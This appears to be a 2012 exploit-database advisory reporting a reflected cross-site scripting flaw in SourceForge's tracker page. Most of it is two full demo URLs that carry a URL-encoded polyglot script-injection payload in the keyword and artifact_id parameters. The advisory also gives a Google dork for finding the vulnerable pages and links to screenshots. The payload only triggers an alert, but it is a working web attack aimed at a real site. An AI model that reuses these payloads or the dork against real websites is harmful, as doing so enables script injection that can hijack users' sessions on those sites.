# Exploit Title: SourceForge.net Cross Site Scripting # Date: 3.03.2012 # Author: Sony # Software Link: http://sourceforge.net/ # Google Dorks: sourceforge.net/tracker/index.php?group_id= bugs or tracker # Web Browser : Mozilla Firefox # Blog : http://st2tea.blogspot.com # PoC: http://st2tea.blogspot.com/2012/03/sourceforgenet-cross-site-scripting.html .................................................................. We can see cross site scripting in the /tracker/index.php?group_id= on the http://sourceforge.net. Our xss in the field : ID-->Filter. It's not a critical bug. Demo: http://sourceforge.net/tracker/?limit=25&func=&group_id=311&atid=100311&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=&assignee=&status=&category=&artgroup=&submitter=&keyword=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&artifact_id=&submit=Filter http://2.bp.blogspot.com/-tfY-iwvmUrQ/T1FDmWohhLI/AAAAAAAAArA/C2KrpgWqces/s1600/SquirrelMail1.JPG http://3.bp.blogspot.com/-qq6BZi2F5Mc/T1FDpuw1koI/AAAAAAAAArM/8QSjxXTc1-o/s1600/SquirrelMail2.JPG http://sourceforge.net/tracker/?limit=25&func=&group_id=1&atid=350001&assignee=&status=&category=&artgroup=&keyword=&submitter=&artifact_id=&assignee=&status=&category=&artgroup=&submitter=&keyword=&artifact_id=%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%27%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F\%22%3Balert%28String.fromCharCode%2888%2C83%2C83%29%29%2F%2F--%3E%3C%2FSCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E&submit=Filter http://1.bp.blogspot.com/-jLrI8ujiA9U/T1FFFOLFZOI/AAAAAAAAArY/0FD89GMK4oM/s1600/idd.JPG .................................................................. InSecurity.Ro Because we care, we're security aware!